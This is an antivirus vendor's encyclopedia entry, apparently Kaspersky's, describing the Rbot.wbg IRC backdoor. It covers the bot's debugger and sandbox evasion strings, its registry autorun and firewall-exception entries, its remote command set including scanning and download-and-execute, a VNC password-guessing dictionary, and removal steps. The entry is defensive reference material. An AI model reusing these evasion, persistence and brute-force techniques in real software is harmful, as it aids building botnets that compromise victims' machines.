Internet threat level: 1
Home→Descriptions→Backdoor.Win32.Rbot.wbg
Backdoor.Win32.Rbot.wbg
| Detected | Nov 23 2008 18:09 GMT |
| Released | Nov 23 2008 21:39 GMT |
| Published | Mar 24 2011 12:24 GMT |
Payload
Removal instructions
Technical Details
This Trojan provides a malicious user with remote access to the infected computer. It is a Windows application (PE EXE file). It is 45 780 bytes in size. It is packed using SVKP. It is written in C++.
Installation
When it launches, the malware checks for the presence of any system monitors and debuggers running, by referencing device drivers through these links:
\\.\SICE \\.\SIWVID \\.\NTICE \\.\REGSYS \\.\REGVXG \\.\FILEVXG \\.\FILEM \\.\TRW \\.\ICEEXTIt checks whether any process has been launched by a debugger or remote debugger. It also checks the name of the computer for the presence of the following strings:
nepenthes currentuser vmware honey sandboxThe malware ceases running upon detection of even just one of the listed conditions, displaying an error message. Then, the malware copies its executable file, named:
%Program Files%\Common Files\System\molox.exeor
C:\RECYCLER\ molox.exeand adds Hidden and System attributes to the file. In order to ensure that it is launched automatically each time the system is rebooted, it adds a link to its executable file in the system registry autorun key:
[HKLM\Software\Microsoft\Windows\CurrentVersion\Run] "WindowsSystem32"="%Program Files%\Common Files\ System\molox.exe"or
[HKLM\Software\Microsoft\Windows\CurrentVersion\Run] "WindowsSystem32"=" C:\RECYCLER\ molox.exe"
Payload
Next, the malware places a link to its executable file in the list of allowed applications in Windows Firewall:
[HKLM\System\CurrentControlSet\Services\SharedAccess\ Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List] "%Program Files%\Common Files\System\molox.exe"="%Program Files%\ Common Files\System\molox.exe:*:Enabled:WindowsSystem32"Then, the malicious bot establishes a connection to the IRC server in order to obtain a command from the malicious user:
dend***p.huWhen it connects to the server, the malware applies the following parameters
USER <rnd> "fo<rnd2>.net" "lol" :<rnd>where rnd is a sequence of letters; rnd2 is a decimal number.
Next, the bot connects to the IRC channel:
#dbFollowing a successful connection to the server, the bot awaits the following commands from the malicious user:
- !v means receipt of new version of bot.
- !d means disconnection.
- !r means reconnection to the same server.
- !q means connection to another server.
- !n means [nickname] change nickname [to nickname].
- !restart means restart bot.
- !scanstop means cease scanning.
- !patch means modification (patch) for the driver "tcpip.sys".
- !total means all downloads are carried out by the bot through "ftpd".
- !vnc means report on VNC (Virtual Network Computing) server status.
- !getcftp means receipt of current "cftp" settings.
- !j (#channel_name) means the command join #channel_name.
- !p (#channel_name) means the command part #channel_name.
- !bk (x) means launch of operation to kill the bot, x being the number of cycles.
- !setcftp (host) (port) (user) (password) (file) changes cftp server setting.
The malware also attempts to obtain access to ftp servers and remote desktops, by scanning the network on receipt of the following command:
!scan (X) (random / logical) (ip/b/y) (vnc_mode) (transfer_mode) [Äèàïàçîí_ñêàíèðîâàíèÿ]The following parameters may be applied to this command:
- X means quantity of simultaneously launched streams.
- (random / logical) means random (1) / logical (0) scanning.
- (ip/b/y) means IP address / scanning of a range of addresses from C and D subclass networks / scanning of a range of addresses from the B subclass network.
- VNC_mode:
1 means with vnc scanning,
2 means vnc scanning and obtainment of administrative access,
3 means vnc scanning only. - Transfer_mode
a. 0 means all bots use "ftp".
b. 1 means local network bots use "cftp", while WAN bots use "ftp".
c. 2 means all bots use "cftp".
- Scanning_range is the range (in the form 127.0.x.x) to be scanned by bots (they do not scan empty network ranges).
The bot may also download files and launch them for execution, by receiving the command:
!h <configuration_data> (URL) [êàòàëîã_äëÿ_çàãðóçêè] (mode)
Configuration_data is a download string presented in the form of an MD5 hash.URL is the link for downloading the file.
Directory_for_download is the directory in which the downloaded file will be saved.
Mode:
0 means download only
1 means download and execute
2 means download, execute, and delete itself
!h <configuration_data>
Configuration_data is a deletion string presented in the form of an MD5 hash.
When obtaining full access to a cftp server, the bot implements the following settings:
Host – oli***yip.hu User – u2m6g Password – k3***mt File – lol.jpg
To obtain access to a VNC server, the bot carries out a search in an attempt to find the correct password. The following strings are used first as a dictionary:123 1234 12345 123456 1234567 12345678 abc abcd 1 admin pass password love
Removal instructions
If your computer does not have an antivirus, and is infected by this malicious program, follow the instructions below to delete it:
- Use Task Manager to terminate the bot's process "molox.exe".
- Delete the original malicious file (the location will depend on how the program originally penetrated the infected computer).
- Delete the following parameters from the system registry keys (see What is a system registry and how do I use it?):
[HKLM\Software\Microsoft\Windows\CurrentVersion\Run] "WindowsSystem32"="%Program Files%\Common Files\System\molox.exe" [HKLM\Software\Microsoft\Windows\CurrentVersion\Run] "WindowsSystem32"=" C:\RECYCLER\ molox.exe" [HKLM\System\CurrentControlSet\Services\SharedAccess\ Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\ List] "%Program Files%\Common Files\System\molox.exe"="%Program Files%\ Common Files\System\molox.exe:*:Enabled:WindowsSystem32"
- Delete the following files:
%Program Files%\Common Files\System\molox.exe
orC:\RECYCLER\ molox.exe
- Perform a full scan of the computer using Kaspersky Anti-Virus with up-to-date antivirus databases (download a trial version).
Backdoors are designed to give malicious users remote control over an infected computer. In terms of functionality, Backdoors are similar to many administration systems designed and distributed by software developers.
These types of malicious programs make it possible to do anything the author wants on the infected computer: send and receive files, launch files or delete them, display messages, delete data, reboot the computer, etc.
The programs in this category are often used in order to unite a group of victim computers and form a botnet or zombie network. This gives malicious users centralized control over an army of infected computers which can then be used for criminal purposes.
There is also a group of Backdoors which are capable of spreading via networks and infecting other computers as Net-Worms do. The difference is that such Backdoors do not spread automatically (as Net-Worms do), but only upon a special “command” from the malicious user that controls them.
© 1997-2013 Kaspersky Lab ZAO. All Rights Reserved.
Industry-leading Antivirus Software.
Registered trademarks and service marks are the property of their respective owners.
The authors' opinions do not necessarily reflect the official positions of Kaspersky Lab.